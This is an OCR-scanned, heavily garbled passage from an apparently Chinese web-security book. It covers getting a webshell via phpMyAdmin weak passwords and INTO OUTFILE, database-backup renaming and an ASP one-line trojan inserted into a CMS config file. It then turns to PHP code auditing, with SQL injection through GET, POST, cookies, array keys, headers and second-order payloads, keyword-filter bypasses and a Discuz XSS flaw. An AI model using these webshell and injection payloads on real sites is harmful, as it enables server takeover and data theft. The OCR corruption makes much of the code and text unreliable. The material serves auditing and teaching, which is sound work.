文件 上 传 是 getshell 的 主要 方式 之 一 ， 除 了 文件 上 传 ， 其 实 还 有 很 多 其 他 的 getshell 的 
方式 。 


1. phpMyAdmin 
利用 弱 口 令 登 录 phpMyAdmin， 访 问 http://URL/phpmyadmin/libraries/select lang.lib. 
php， 可 以 得 到 目标 站 点 的 物理 路 径 ， 然 后 选择 一 个 数据 库 ， 运 行 以 上 MySQL 语句 : 


Create TABLE а (сша text NOT NULL); 
Insert INTO a (cmd) VALUES (") ; 
select спа from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; 


Prop TABLE ТЕ ЕХІ5Т5 а; 


这 些 语句 的 运行 效果 如 下 : 

运行 第 一 条 语句 在 选 定 的 数据 库 中 建 一 个 表 a; 运行 第 二 条 语句 将 PHP 一 句 话 木 
马 写 到 a 表 中 ; 接 看 执行 第 三 条 语句 ， 把 a 表 输 出 到 网 站 目录 下 的 d.php 里 ， 即 可 成 功 
getshell。 


2. 数据 库 备份 
数据 库 备份 也 是 常见 的 getshell 方 法 ， 不 过 mdb 数 据 库 备份 在 比较 新 式 的 后 台中 已 经 很 
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少见 了 ， 但 在 老式 后 台中 仍然 是 很 常见 的 。 一 般 情况 下 ， 需 要 满足 两 个 条 件 一 定 能 成 功 
getshell: 数据 库 路 人 径 可 挖 和 备份 文件 名 可 控 ， 如 图 3-41 所 示 。 


当前 数据 库 地 址 (相对 路 径 ) : data_jk/ joekoe_data. asp 
备份 数据 库 目录 (相对 串 径 ) : databackup 如 目录 不 存在 ， 程序 将 自动 创建 


备份 数据 库 名 称 (文件 全 名 ) : databak_2015-7-7. asp 如 该 文件 存在 将 会 被 要 盖 ， 如 没有 将 
自动 创建 


注 童 : 

® 所 有 路 径 都 是 相对 于 程序 空间 根 目录 的 相对 路 径 

。 请 尽量 避免 使 用 .mdb 的 后 绿 名 命名 备份 数据 库 

e 您 可 以 用 这 个 功能 来 备份 您 的 网 站 数据 , 以 保证 您 的 数据 安全 | 


图 3-41 对 备份 路 径 和 名 称 进行 修改 
这 里 只 需要 将 当前 数据 库 路 径 改 成 上 传 的 图 片 路 径 ， 再 将 备份 数据 库 名 修改 为 后 门 地 
址 即 可 。 


3. 写 入 配置 文件 


例如 xycms 的 后 台 配 置 文件 getshell， 在 配置 文件 中 任意 一 栏 中 插入 一 句 话 木 马 " %>< 
%ехесше (Request (chr(112))) %%><% ' " 即 可 getshell， 如 图 3-42 所 示 。 


自助 洗车 机 “%>C%execute (Request (chr (112)))%><%’ ” | 


upLoadFile/2013926589 
3-42 插入 一 句 话 木 马 
被 插入 代码 的 文件 inc/config.asp 的 源码 如 图 3-43 所 示 。 


ЖА Во: 1\wwwroot\ 子 四 2\Inc\config. asp 
<% 
Const итпате=“ 2 ее 站 称 
Const descriptio АД, родено 
Const keywords=" xecute (Request (chr (112)))%><% “ 网 站 关键 字 
Const wzurl=“htt :om ”dx | 
Const wzlogo=“up 35891 gg 站 LDG0 图 片 路 径 
Const icp=" 苏 ICF јато 
Const тападепале 1 body 联系 人 
Const ета:1="899 : 5.8 


Const telrum=”” 
Const рЬопепш-“ ZEH, 
Const faxnum=““ 
Const qqnum=“899 


Const address= i М ау 

Const ebook sh=" НЕ: 0- 不 审核 ; 1- 审 核 。 

Const on_run= 07 НБ. Е ала ETE 
пи off 4с- “4 ЕН! 请 您 访问 ， 谢 谢 合 作 . . . ”网 站 关闭 训 明 


3-43 配置 文件 源码 
4. 文件 包含 


在 黑 盒 渗透 中 ， 文 件 包 含 也 是 常见 的 getshel] 方 法 之 一 ， 接 下 来 在 审计 环节 将 详细 讲解 
其 原理 及 利用 方式 。 


一 MA \ 
шиесі / Же bŠ 
Ww Ил ван 


代码 审计 一 一 防 患 于 未 然 
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何 为 代码 审计 ? 通俗 地 讲 ， 通 过 阅读 一 份 源码 ， 对 其 进行 各 类 漏洞 挖掘 ， 这 样 的 过 程 
便 统 称 为 审计 。 在 审计 中 ， 你 不 但 需要 知道 各 类 漏洞 的 原理 ， 还 需要 民 好 的 审计 环境 。 在 
面 对 大 型 开源 程序 时 ， 信 息 量 往往 十 分 巨大 ， 所 以 工具 的 分 析 和 检索 是 必 不 可 少 的 。 本 章 
将 以 PHP 代 码 为 例 ， 来 讨论 代码 审计 的 相关 知识 。 

PHP 作 为 当今 热门 的 脚本 语言 ， 尤 其 适合 Web 开 发 。 因 为 其 拥有 跨 平台 、 易 上 手 、 功 
能 强大 等 特点 ， 现 被 广泛 使 用 。 然 而 ， 随 看 越 来 越 多 地 被 网 站 使 用 ，PHP 引 发 的 安全 问题 
也 变 得 热门 起 来 。 


41 常用 的 审计 工具 


好 工具 才能 市 来 高 效率 ， 首 先 来 了 解 一 下 常用 的 审计 工具 。 


1. Notepad 
虽然 Notepad Са Ж) 拥有 简洁 的 界面 ， 但 因为 其 效率 低下 ， 使 用 的 人 并 不 多 。 
2. сеау РНР 


Seay PHP 代 码 审计 工具 支持 单个 关键 词 扫 描 、 批 量 消 数 扫描 、 批 量 正 则 匹配 。 相 对 纯 
文本 而 言 ， 提 高 了 不 少 效 率 ， 如 图 4-1 所 示 。 


文件 系统 тава НЕЕ ығын шиш ”软件 帮助 
FOSE 


| ва || вена || вш | mga; 09 


ш УНИИ 


清空 浏览 提示 : 浏览 载 和 源码 即 可 扫 痢 ， 尝 言 扫 指 可 在 扫描 桓 置 自 定义 国 数 和 正则 去 达 式 ， 黑 认 高 速 ， 区 分 大 小 写 ( 只 对 单 ; 


图 4-1 Seay PHP 界 面 
З. CodeXploiter 


这 是 一 球 国 外 的 代码 审计 工具 ， 其 特点 在 于 能 够 初步 判定 存在 问题 的 代码 位 置 和 存在 
的 问题 ， 再 结合 手工 但 看 即 可 判定 问题 是 否 存在 ， 十 分 便捷 。 
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4. 抓 包 改 包 工具 


这 些 工 具 对 有 渗透 经 验 的 读者 来 说 应 该 不 会 陌生 ，Burp Suite 和 Fiddler 比 较 知 名 ， 如 
图 4-2 和 图 4-3 所 示 。 


х 


File Edit Rules Tools View Нар беоЕдде 
ФА Winconfig С) ++ Replay X~ » бо | $ Stream ЕЕ бесоде | Keep: All sessions ~ © Апу Process 


图 4-3 Fiddler 
5. 字符 转换 工具 


字符 转换 工具 很 多 ， 笔 者 在 这 里 推荐 小 莫 多 功能 转换 工具 ， 文 持 将 普通 编码 转换 为 
URL/SQL Еп/Нех/Авс/МО5 32/М05 16/Base64 等 格式 的 编码 ， 非 常 实 用 ， 如 图 4-4 所 示 。 


6. 常用 的 火狐 插件 


对 于 火狐 浏览 器 ， 部 分 读者 可 能 还 不 清楚 它 的 价值 。 在 渗透 中 ， 火 狐 浏 览 咒 以 及 它 的 
拓展 插件 是 必 不 可 少 的 工具 ， 它 在 PHP 审 计 中 也 是 个 很 得 力 的 助手 。 在 这 里 对 于 火狐 浏览 
器 的 安装 就 不 阐述 了 ， 下 面 来 给 大 家 介绍 几 球 常用 的 插件 。 

火狐 插件 的 安装 很 简单 ， 单 击 菜单 中 的 “管理 您 的 附加 组 件 ” 按 钮 ， 然 后 在 搜索 框 里 
搜索 要 安装 的 插件 名 称 即 可 ， 如 图 4-5 所 示 。 


EN 


| 管理 您 的 附加 组 件 (Ctrl+Shift+A) 


火狐 修复 工具 


в 
- 
Э о № 
a 


о о 


84-4 ‚ЕТ 84-5 安装 和 管理 火狐 插件 
(1) Firebug。Firebug 在 浏览 网 页 的 同时 又 可 作为 功能 丰富 的 开发 工具 ， 使 用 者 可 以 
对 任何 网 页 的 CSS、HTML 和 JavaScript 进行 实时 编辑 、 调 试 和 监控 ， 如 图 4-6 所 示 。 


x 


以 | Е | script < window#ap..r_window 


В <vindow з4-"аррсепкет в: пдоч" xmlna="http://www- mozilla.org соптапйЯзет, 

/теутазгег/дасекеерег/бһеге 13 .оп1у.кш1" xmlns:html="http: command, 

/fwwa -н3 org/1999/xhtml" title=" KIE broadcasterset, 
broadcaster, 
observes, 
keyset, key, 
гоо1Басра1егге, 
toolbarset, 
template, rule, 
conditions, 


ШІ" hasBrowserHandlers="true">» 
thtml:link ге1="їсоп" href="chrome://ntab/skin/logo 
/firefox.ico" style="display-ncne"/> 
В <browser id="content" type="cortent" src="http-://i #1ге 
охсһіпа. сп 
/?Эсасһарсав-20141231" #1еж-"1" clickthrough="never"> 


<script type="text/javascript"> action, 
</window> bindings, 
binding, 


content, member, 
triple, 
treechildren, 
treeicem, 


图 4-6 ”Firebug 调 试 工具 
(2) Live HTTP headers。 该 工具 用 来 对 数据 包 进 行 捕 获 ， 如 图 4-7 所 示 。 


HTTP Headers 
http://cclv.-firefoxchina.cn/cclv/v2/patterns.son 


GET /cclv/v2/patterns.json HTTP/1.1 

Host: cdv.firefoxchina.cn 

User-Agent: Mozilla/5.0 (Windows МТ 6.3; WOW64; rv:38.0) Сесіко/20100101 Firefox/38.0 

Accept: text/html,application/xhtml+xmlapplication/<ml;q=0.9*/*;q=0.8 

Accept-Language: zh-CN, zh;q=0.8,en-US;q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

Cookie: Нт Імі 994738Ь5#302сЬ062-#191074542-4=1436185500,1437071513,1437071550,1437581122 


Connection: keep-alive 


HTTP/1.1 200 OK 
Expires: Wed, 22 Jul 2015 16:12:45 GMT 
Date: Wed, 22 lul 2015 15:42:45 GMT 


á и 


Save All.. Replay... Capture 


84-7 Live HTTP headers 
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(3) НасКЪаг. НасКЪаг в € f НЮ ТИ, 501. XSS, РОЗТЯЖ, ШЖ 
等 ， 如 图 4-8 所 示 。 


< A https://www.baidu.com Оте 


ІМТ Y| = Ф SQL- XSS- Encryption- Encoding- Other- 
ші Load URL 
% Split URL 
›) Execute 


Г] Enable Post data [Г] Enable Referrer 
图 4-8 Hackbar 
善 用 这 些 插件 ， 可 以 极 大 地 提高 效率 ， 刚 开始 使 用 时 ， 各 位 读者 可 以 多 花 一 些 时 间 来 
ЖЕЛІ, Ек, ЛАС. 


42 SQL 注入 


如 今 ， 随 着 PHP 被 广泛 使 用 ，PHP 的 安全 问题 越 来 越 被 关注 。 而 最 常见 的 搭配 就 是 
PHP+MySQL， 接 下 来 我 们 探讨 一 下 PHP 审 计 中 MySQL 注 入 的 挖掘 。 


4.2.1 注入 的 原理 


顾名思义 ，SQL 注 入 就 是 通过 把 SQL 命 令 插入 到 Web 表 单 提交 、 输 入 域名 或 页 面 请 求 
的 得 询 字 符 串 ， 最 终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 的 目的 。SQL 注 入 是 当今 网 络 上 
最 普 蜗 的 一 种 攻击 方法 。 
为 了 更 好 地 了 解 其 原理 ， 下 面 来 看 一 段 问 题 代 码 。 
<?php 
include ( 'contig.-php') ; 
1Е ($ СЕТ["1а']) { 


ста Свара //GET 方 式 
$sql="select * from test user where id=$id"; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 


echo mysql егтог(); 
} 


2> 


从 代码 中 可 以 看 到 ， 先 将 参数 id 的 值 以 GET 方 式 传递 给 变量 id， 然 后 直接 将 变量 id 代 
入 了 SQL 语句 进行 查询 。 而 当 提 交 如 单 引 号 这 样 的 特殊 字符 时 ， 便 会 出 现 语 法 错误 ， 从 而 
产生 报错 。 
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select * from test user where id=$id>select * from test user where id=' 
因此 ， 一 个 最 简单 也 最 典型 的 SQL 注 入 漏洞 出 现 了 。 提 交 单 引号 后 的 结果 如 图 4-9 所 示 。 


http://localh..t.php?id=1%27 х \ + 


\ 4 а localhost/test.php?id=1' О v е | а Google <Ctrl+K: | ў | 三 » | = 
Ы 


[INT т] эх SQ- XSS- Encryption: Encoding- Other- 
а Load URL 
Ü Split URL 
JJ Execute 
Enable Post data Enable Referrer 


You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near "" at line 1 


图 4-9 提交 单 引 号 


422 常见 的 注入 


在 审计 中 ， 最 常 出 现 的 注入 便 是 GET 注 入 、POST 注 入 和 Cookie 注 入 。 而 POST 注 入 
也 是 最 容易 被 忽略 的 ， 有 时 可 能 因为 传递 的 参数 较 多 ， 常 常 忽略 某 个 参数 的 过 滤 ， 从 而 
导致 了 注入 。 在 实际 开发 中 ， 往 往 有 的 开发 人 员 使 用 了 REQUEST 传 参 ， 却 只 对 GET 进 行 了 
过 滤 ， 因 此 可 以 换 一 种 方式 提交 数据 进行 注入 在 黑 盒 中 更 加 普遍 ) 。 下 面 来 看 两 段 问题 
代码 。 


Global .php: 
<?php 
foreach ($ СЕТ as $get key=>$get таг) { // 遍 历 所 有 GET 过 来 的 值 


if (is numeric($get уаг)) { 
зае! [strtolower ($get кеу) ]=get 115 ($деі уаг) ;// 加 载 函 数 get int 
| else | 


ае стеной ный P= 
function get int ($number) { 
return intval ($number); ПЕН 1] 390 


2> 


<?php 
include ('config.php'); 


жак “代码 审计 __ 防 患 于 未 然 L ТИ 


include ('global.php'); // 加 载 过 滤 文件 
$14=$ ВЕОЧЕЗТ ['1а']; 

$sql="select * from test user where ій-біа"; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 
echo mysql еггог(); 


2> 


因为 REQUEST 默 认 情 况 下 包含 了 $ СЕТ, $ POSTAIS COOKIE 的 数组 ， 虽 然 对 GET 方 
式 进 行 了 过 滤 ， 但 仍 可 以 用 POST 或 者 Cookie 的 方式 来 提交 数据 ， 从 而 绕 过 了 过 滤 进 行 注入 。 

注意 : POST 传递 是 位 于 数据 包 中 的 。 因 此 ， 注 入 时 便 需 要 用 到 抓 包 改 包 工具 ， 这 里 
直接 用 火狐 插件 代替 ， 如 图 4-10 所 示 。 


7 http://localhost/test.php х 


+ Ф localhost/test.php Я ус 4 Google ск WW Ш > | Е 


мт = Ф 501» XSS- Encryption- Encoding- Other- 
ФӘ LoadURL  http:/focalhost/testphp — í í í í í í í í í í í í 
Ш Split URL 


[© Ехесиїе 


Enable Post data Enable Referrer 


Post data id=1| 


You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ™ at line 1 


图 4-10 POSTA 
很 多 开发 人 员 在 开发 中 对 数组 的 过 滤 不 严 ， 往 往 只 是 过 滤 了 value， 而 忽略 了 key， 下 
面 来 看 一 段 代 码 。 


<?php 

include (' сопіс.рһр'); 

бій-5 СЕТ['іа']; 

if (15 аггау (514) ) { 

Ғогеасһ (519 аз $Кеу=>$уа1ае){ //}8/ 

5уа1 пе-1п та! ($value); // 对 value 进 行 强制 整 型 
$5а1="5е1есЕ * from test user where id=$key апа изегпаше- 
$value"; 
$гези1&=му5а1 query ($sql); 


есһо туді еггог(); 


2> 
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可 以 看 到 上 述 代码 对 id 的 value 进 行 了 过 滤 ， 却 忽略 了 对 key 的 过 滤 ， 并 且 将 key 代 入 了 
得 询 ， 因 此 可 以 对 key 进 行 注入 ， 如 图 4-11 所 示 。 


hitpy/localh..hp?id[1%27]=1 ж 


+ @ localhost/bakphp?id{[1]=1 ga с | Q, Google «стек» | ж за $~ 


(ы, = © 501» XSS- Encryption- Encoding» Other- 
ча Load URL 
4 Split URL 
2) Execute 
Enable Post data |” Enable Referrer 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near " and username=1' at line 1 


图 4-11 ”数组 key 的 注入 
注意 : 这 里 的 注入 格式 为 xx.test. php?id[ 注 入 语句 ]=1。 


423 http 头 注入 


何 为 http 头 ? http 客 户 程序 癌 服务 器 发 送 请 求 的 时 候 必须 指明 请 求 类 型 ， 从 而 产生 了 
http 头 。 和 常见 的 http 头 如 下 所 述 。 
Host: 初始 URL 中 的 主机 和 端口 。 
Referer: 包含 一 个 URL， 用 户 从 该 URL 代 表 的 页 面 出 发 访问 当前 请 求 的 页 面 
User-Agent: 浏览 器 类 型 。 
Accept: 浏览 器 可 接收 的 MIME 类 型 。 
Accept-Language: 浏览 器 所 希望 的 语言 种 类 。 
Connection: 表示 是 否 需 要 持久 连接 。 
Content-Length: 表示 请 求 消息 ла 长 度 。 
Cookie: 这 是 最 重要 的 请 求 头 信息 
而 在 审计 中 ， ани. 
> User-agent， 浏 览 器 类 型 (F). 
> Referer， 来 源 〈 少 ) 。 
> X-Forwarded-For， 获 取 IP (多 ) 。 
> client ір, ЖАР (多 ) 。 
这 里 给 出 一 段 X-Forwarded-For 注 入 的 问题 代码 。 
Get .php: 


v у V V V у V V 


<?php 
$info ip=$ SERVER['HTTP X FORWARDED FOR']; // 获 取 X_ FORWARDED FOR 
Sinfo referer = $ SERVER['HTTP REFERER']; 
Sinfo user agent= $ SERVER['HTTP USER AGENT ' ] ; 


Е». 
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Test .php : 

<?php 
include ('config.php') ; 
include ('get.php'); 
$sql="INSERT INTO test info (ір) VALUES ($info ip) "; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 
есһо mysql еггог(); 


2> 


burp intruder repeater window about 


target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


host localhost 


raw | headers | hex | 


СЕТ //test.php НТТР/1.1 

Host: localhost 

User-Agent: Моті11а/ 5.0 (Windows МТ 6.1; ку:38.0) Сеско/20100101 Firefox/38.D 
Accept: text/html,application/xhtml+x=ml,application/xml;q=0.9, */*;-0.86 
Accept-Language: zh-CN, zh;q=D.8,en-US;q=D.5,en;q=0.3 


Accept-Encoding: gzip, deflate 
X-Forwarded-For: '| 
Connection: keep-alive 


+11211 | 0 matches 


ан | headers | 


Connection: Keep-Alive 
Content-Type: text/html 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the riqht syntax to use near '')' at line 1 


Мы ы | 


length: 379 (1,031 millis) 


图 4-12 һар À 


424 二 次 注入 


随 着 安全 问题 日 趋 被 重视 ， 一 些 简单 的 SQL 注 入 在 大 中 型 开源 程序 中 已 基本 销声匿迹 
了 。 而 出 现 更 多 的 则 是 二 次 注入 ， 相 对 于 一 次 注入 漏洞 而 言 ， 二 次 注入 漏洞 更 难以 被 发 
现 ， 但 是 它 却 具 有 与 一 次 注入 攻击 漏洞 相同 的 攻击 威力 。 
下 面 来 看 茶 个 开源 商场 系统 的 漏洞 实例 。 
<?рһр 
ТЕ (1ззе! ($ 5ЕЗЗТОМ['сакЕ'] ['1п'])) { // 重 复 执 行 订 单 


unset ($ SESSIONL[ 'сагё"']); 


“дүү “А 黑客 与 安全 技术 指南 


сеггог( ("submit order Ем1се")); 


$ ЗЕЗЗТОМ [ cart 11" 1п"| = trus; 


// 正 在 执行 订单 


$tradeid = $time.mt гапа (100,999); 


$data = аггау ( 
"tradeid" 
piel 
"uname" 
"addtime" 
"status" 
"totalfee" 
"itemfee" 
"postfee" 
"пап п 
"сопроп" 
"ехргеѕѕмауіа" 
"розтгуре" 
"receiver name" 
"receiver province" 
"receiver city" 
"receiver district" 
"receiver address" 
"receiver zip" 
"receiver link" 
"memo" 
"payment " 
"1зтах" 
"tax company" 


); 


v V V V V V V V v V V V V v V V V V V V v V V 


$Егааела, 
$this->uid, 
5 SESSION['uname ' 1, 


$time, 

"WAIT PAY", //ЖХЯ 

getPrice (Stotalfee,2, 'int'), 
getPrice ($itemfee,2, 'int'), 
getPrice ($postfee,2, 'int'), 
ошап. 2 Smanl ве 4 Е”, 
$сопроп ? $сопроп | "депо" | : 0, 
Swayid, 

sposttype, 


Saddress['receiver'], 
Saddress['province'], 
Saddress['city'], 
Saddress['district'], 
Saddress['address'], 
Saddress['zipcode'], 
Saddress['link'], 
Smemo, 

зраушептсоде, 

$istax, 


Stax company 


ОВ: -qetDB() >insert("trade",šdata); //іпзегі х ЛЕЕ 


задддага = Spromodata = аггау(); 


56 
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public function insert ($tableName, $data = аггау()) | 
$sql = "INSERT INTO ".$this->getTableName ($StableName); 
$sql .="(".implode(",",array map (array ($615, "езсарекеу") ‚аггау_ 
keys ($data))).") values ("; 
$sql .= $this->getInsertVal ($data); 
Sol ЕЕ. 
$this->query ($sql); 
ТЕ (15Е115->еггпо) | 
return $this->lastid();/ 
} 


return false; 


getInsert Vl "Ж: f Л.Л, ЖАННЫН НЕ, кам. М FERARI 
中 来 找 找 出 库 的 地 方 。 


if ($count) { 
$this->data["pagearr"] = getPageArr ($page, $pagesize, $count, '',true); 
$this->data['trades'] = DB::getDB()->select ("trade", 
"tradeid, receiver пате, totalfee,addtime,status,payment", $мһегеѕіг, 
"tradeid DESC", $this->data['pagearr'] ['limit'],"tradeid"); 
// 这 里 出 库 , 同样 嵌 套 了 几 个 函数 , 但 也 没有 进行 过 滤 同 样 省 略 
$tradeids = array keys ($this->data['trades']); 
Sorders = DB: : дет В () ->ѕе1есі ("order","itemid, itemimg, itemname, 
tradeid,orderid","tradeid in ".cimplode ($tradeids)); 
foreach (Sorders аз $огаег) | 
‘this >дйага | "гтайев”" 11зогает Г Етадета ili огдет "1 | огдег гогдетта [1 
= богаег; 
} 

} 

$this->output ("gettrade"); 
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入 库 、 出 库 都 没有 进行 过 滤 ， 因 此 可 以 判定 存在 二 次 注入 。 上 再 回 到 insert 函 数 ， 可 以 
看 到 碍 询 语句 如 下 。 


INSERT INTO cart trade('tradeid','uid','uname','addtime','status', 
"'totalfee","itemfee","postfee","man","coupon","expresswayid","post 
type','receiver паше", "гесетуег ргоу1псе", "гесетуег city','receiver _ 
аізегісе","тесеіуег аддгезз", "гесетуег г21р", "гесетуег 1іпк', ' тето', "рау 
ment','istax','tax сошрапу"' ) уа1чез ('1418809144596',2, "ёеѕі', 1418809144, 
ATO PAY. E0 ST О el о и 


ЛЕ Ва жэ,» С ee | 


可 以 构造 receiver=', 1, 1, 1, чзег(), 1, 1, 1, 1,0, 2)#， 和 逃逸 出 单 引 号 并 闭合 ， 用 # 主 释 掉 后 
面 多 余 的 语句 ， 提 交 过 程 如 图 4-13 所 示 。 


收 货 人 信息 


© "11,1иег(),1,1,1,1,0,2)% 北京 北京 市 东城 区 111 


© 添加 新 地 址 
"АЛА : ' 1, 1, 1, мзег (), 1, 1,1, : 


北京 у - 北京 市 - 


100010 


* 电 话 /手机 , : 11111111111 


[保存 并 使 用 这 个 地 址 | 
图 4-13 Е 


提交 的 数据 包 如 图 4-14 所 示 。 


ee | response | 
raw | params | headers | ner 


[POST /index. php?mode l=buy&action=saveaddr HTTP/1.1 | 
Host: skyofdll.hlk.delldns.com 

| User-Agent: Мо2і11а/ 5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Ғіге#ох/38.0 

Accept: */* 

| Accept-Language: zh-CN, 2; 4-0.В,еп-П3; 4-0.5,еп; 4-0.3 

М Accept-Encoding: gzip, deflate 

| Сопсепс-Туре: application/x-www-form-urlencoded; charset=UTF-8 

) X-Requested-With: XMLHttpRequest 

| РеТегег: http://skyofdll.hlk.delldns.com/index.php?model=buy 

| Сопсепс-Пепаси: 159 

Cookie: сакс сагстісеп 47 3; | 

|сакс_зезз=403276419781Е7064аа718ВаОаа42 6611200655553; 

| р SID=SACC47A54DCOD13BEC6SCBDBƏBIFSAF5; сакс зепӣзтз=1; сакс зепаета11=1; 

Мсасс и1згогу-47 

Соппесс1оп: keep-alive 

1 Ркаста: no-cache 

Cache-Control: no-cache 


| үесеімек-!%2С1%2С1%2С1%2Счизег ()52С152С152С152С152С052С2) з2Заркоу1псе+ 1 10000&сісу=1 
1 101006вй13гг1с5#110101 вайддгезз- 111611пК-1111111111 1621 рсойее 1000 1 Овадд9гезз1а-8 


| С Е mes|| 
4-14 ”提交 的 数据 包 
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成 功 提 交 后 ， 切 到 个 人 中 心 ， 然 后 合 看 订单 ， 如 图 4-15 所 示 ， 可 以 看 到 出 库 的 地 方 已 
经 “ 髓 看 ”注入 出 的 数据 了 。 


1434373133743 
ЕСЕН: 1 


5куо 1 Фіоса!һов% 


图 4-15 成 功 二 次 注入 


4.2.5 过 滤 的 绕 过 


在 开发 中 ， 开 发 人 员 想 尽 办 法 杜绝 注入 的 情况 出 现 ， 而 通常 采用 的 办 法 便 是 过 滤 。 
常见 的 过 小 大 致 分 为 正则 和 关键 词 的 过 小， 相对 关键 词 的 过 滤 ， 正 则 过 小 的 方式 则 更 
为 高 效 。 但 是 并 没有 绝对 安全 的 方法 ， 任 何 防御 都 存在 被 绕 过 的 风险 ， 而 常见 的 绕 过 
如 下 。 

> 大 小 写 混合 。 

> 替换 关键 字 。 

> 使 用 编码 。 

> 使 用 注释 。 

> 等 价 函 数 与 命令 。 

> 使 用 特殊 符号 。 

> http 参 数控 制 。 

> 整合 绕 过 。 


接 下 来 将 展示 几 个 对 关键 词 进行 过 小 的 简单 bypass〈 绕 过 ) 方法 。 
1. 过 滤 代码 
preg па с ('/ (апа |ог | иптоп | мһеге | 111) /Т',$1а) 


绕 过 方法 : 对 关键 词 and，or，union，where，limit 进 行 了 过 滤 ， 构 造 代码 类 似 于 11|| 
(select user from users group by user id having user 19=1 ) = 'admin' 即 可 绕 过 。 


2. 过 滤 代 码 


preg match('/select|orderl|insertlupdatelevalldocument|deletelinjection|j 


ectionƏi А ААА. el апа ss 


绕 过 方法 : 仅 对 小 写 的 注入 关键 词 进 行 了 过 滤 ， 大 写 即 可 绕 过 。 
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43 XSS 审 计 


XSS 攻 击 是 近 些 年 盛行 的 一 种 攻击 方式 ， 恶 意 攻击 者 往 Web 页 面 里 插入 恶意 html 代 
码 ， 当 用 户 浏 览 该 网 页 时 ， 骨 入 其 中 的 html 代 码 会 被 执行 ， 从 而 达到 恶意 攻击 用 户 的 特殊 
目的 。 而 PHP 中 对 XSS 的 审计 又 是 怎样 的 呢 ? 

这 是 一 个 Discuz 的 历史 漏洞 了 ，Discuz 第 一 时 间 在 X3.1 版 本 的 一 个 补丁 中 修复 了 这 一 
漏洞 ， 不 过 对 于 仍然 使 用 看 Discuz X3.1 旧 版 本 (其 实 绝 大 多 数 都 在 使 用 旧版 本 ， 因 为 补丁 
发 布 的 时 候 X3.1 已 经 发 布 很 信 了 ) 及 以 下 版 本 的 网 站 来 说 ， 这 个 漏洞 依然 有 效 。 下 面 我 们 
来 体验 一 下 这 个 漏洞 的 审计 过 程 。 

有 关 这 个 漏洞 的 代码 在 \upload\source\function\ 下 的 function discuzcode.php 中 。 


119 1#(5а11омррсоае) 1 

120 if (strpos ($msglower, "еа2к://") != FALSE) (| 

21 Se5sage рр 
smessage); 

122:1 

1354 


很 显然 ， 这 段 代 码 用 于 检测 是 否 启 用 ed2k 协 议 并 在 第 121 行 对 ed2k 链 接 进 行 了 处 理 。 
为 了 让 读者 更 清晰 地 理解 这 些 PHP 代 码 ， 本 书 假设 读者 对 PHP 的 掌握 处 于 入 门 阶段 ， 对 涉 
及 的 一 些 API 做 一 个 简单 介绍 。121 行 中 的 preg replace 函 数 原型 如 下 。 


mixed preg replace ( mixed $pattern , mixed replacement , mixed 
$subject |, int $11116 = -1 |, int &$count ]] ) 

// preg_replace 执行 一 个 正则 表达 式 的 搜索 和 替换 : 搜索 subJject 中 匹配 pattern 的 部 分 ， 
Ягер1асетеп Т tA 


对 于 刚刚 接触 代码 审计 的 初学 者 来 说 ， 可 能 会 感觉 目 己 对 代码 的 掌握 程度 不 够 ， 没 关 
系 ， 每 种 语言 的 官方 手册 对 每 个 函数 都 有 详细 解释 以 供 开 发 者 学 习 。 对 于 有 一 定 经 验 的 审 
计 者 来 说 ， 开 源 项 目的 手册 或 说 明文 中 仍 有 很 多 重要 的 部 分 ， 而 且 同 一 厂商 过 去 的 漏洞 也 
可 能 为 审计 引导 一 个 方向 ， 不 要 考 于 站 在 巨人 的 肩膀 上 ! 

这 个 函数 调用 parseed2k() 函 数 对 $message 进 行 正 则 人 处理 ， 下 面 来 跟踪 处 理 函 数 
parseed2k()。 


320 function рагзеед2к ($url) | 


321 global Š G; 

ала list (, $type, $name, 5512е,) = ехр1оае('|', $url); 
// 用 来 读 取 连 接 中 的 类 型 , 名 称 与 大 小 

323 mipi =" = e PA yr азаи ry 
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324 $name = addslashes ($name); 

3253 if ($type == 'file') { 

326 $ed2kid = 'ed2k '.гапаот (3); 

321 return "<а 19-"".зед2К1д."" һгеғҒ="'.$иг1.'" Тагдеб-". 


Бтапк">" алш зреста1 срагз (чиг1й4есойе ($паше)) .' 
('.sizecount (55172е).!) </а><зсгтрЕ language="javascript"> 
$(\''.5еа2к1ла.'\') .innerHTML=htmlspecialchars (ппезсаре 
(decodeURIComponent (\''.$пашме.'\')))+\' ('.sizecount 


(5з17ге) .")Х";</зсгарЕ>"; 


328 } else { 

323 Pecari ЕЕ ен ЕЕ Seear 
330 } 

331 } 


从 这 段 代 码 中 可 以 看 出 ，parseed2k() 并 没有 对 参数 $size 进 行 安全 处 理 ， 甚 至 没有 对 
$size 进 行 类 型 转换 〈 和 暂且 认 为 这 是 程序 员 的 疏忽 ) ， 因 此 函数 sizecount($size) 中 传 入 的 是 
字符 串 类 型 的 $size 变 量 。 

下 一 步 跟 进 sizecount(0) 函 数 ， 它 在 同 目 录 下 的 function core.php 中 : 


1601 Ғопсііоп sizecount ($517е) | 

1602 if ($size >= 1073741824) { 

1603 55і2е = гоппа ($5172е/1073741824 * 100)/100 . "СВ"; 
1604 | етзе 1 (551уе > 1048485751 1 

1605 size = гоцпа(5517е / 1048576 % 100) / 100 ." МВ": 
1606 +: е! зе зЕ алга >= 1024) | 

1607 ӛзіхе = гошай(5517хе / 1024 = 100) Е 100 „>Фкв": 
1608 | else | 

1609 $size = $size . 'Bytes'; 

1610 } 

1611 return $size; 

1612 } 


这 段 代码 用 来 对 文件 大 小 进行 划分 ， 字 符 串 类 型 的 Ssize 的 值 在 与 Number 类 型 比较 
时 ， 会 被 强制 转换 成 Number 类 型 后 再 进行 比较 。 如 果 传 入 的 $size 并 不 是 纯 数字 字符 串 ， 
那么 $size 的 值 会 被 转换 成 NaN (Not a Number) ， 不 会 触发 前 三 个 if 语句， 直接 进入 else 语 
